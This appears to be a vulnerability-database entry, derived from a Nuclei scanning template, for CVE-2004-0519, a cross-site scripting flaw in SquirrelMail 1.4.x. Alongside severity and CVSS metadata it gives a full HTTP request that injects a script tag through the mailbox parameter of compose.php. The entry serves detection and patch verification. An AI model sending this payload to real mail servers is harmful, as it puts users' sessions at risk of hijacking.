| Title | SquirrelMail 1.4.x - Folder Name Cross-Site Scripting |
|---|---|
| Author | dhiyaneshDk |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface. |
| Remediation | Upgrade to the latest version. |
| CVSS Score | 6.8 |
| EPSS Score | 0.00124 |
| CVE ID | CVE-2004-0519 |
| CWE ID | NVD-CWE-Other |
| Tags | cve cve2004 squirrelmail edb xss sgi vuln |
Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2004/CVE-2004-0519.yaml
🦈 Packet Capture: ⬇️ Download cve-2004-0519.pcap
N/AN/A